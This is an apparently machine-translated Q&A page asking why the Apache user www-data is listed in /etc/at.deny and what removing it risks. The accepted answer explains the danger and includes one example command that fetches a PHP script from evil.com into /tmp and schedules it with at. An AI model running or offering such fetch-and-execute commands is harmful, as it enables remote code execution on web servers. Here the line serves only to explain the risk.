Почему `www-data` (пользователь Ubuntu / Apache) указан в файле`/etc/at.deny`?

Question

Почему `www-data` (пользователь Ubuntu / Apache) указан в файле`/etc/at.deny`?

У меня есть сценарий cgi, который пересылает письмо при неудачной попытке через 5-10 минут после того, как пользователь заходит на страницу. Я думал сделать это с помощью at команда от вызова Py thon (os.system("at now + 5 minutes <<< ' python resend.py data'")). Тестирование показало:

$ sudo su www-data
$ at now
You do not have permission to use at.
$

Какого рода горе я подвергаю себя, если я удаляю пользовательские "www-данные" из /etc/at.deny файл?

2

apache-2.2 security permissions at

Источник

Jamie 20 ноя '13 в 18:04

1 ответ

Решение

Другие вопросы по тегам apache-2.2 security permissions at

nandoP 20 ноя '13 в 18:11 2013-11-20 18:11 · Accepted Answer · 2013-11-20 18:11

Внося это предлагаемое изменение, вы позволяете пользователю apache запускаться для выполнения заданий в будущем, в более позднее время.... я не знаю, возможно ли это, но если вы где-то можете подорвать веб-сервер для выполнения серверной части чего-то вроде

exec ("cd / tmp && wget http://evil.com/evil.php && at afterdate /tmp/evil.php")

это будет exec, который загрузил скрипт php, позже.

это в основном один раз cron, и, честно говоря, я обычно отключаю его, в пользу Дженкинс.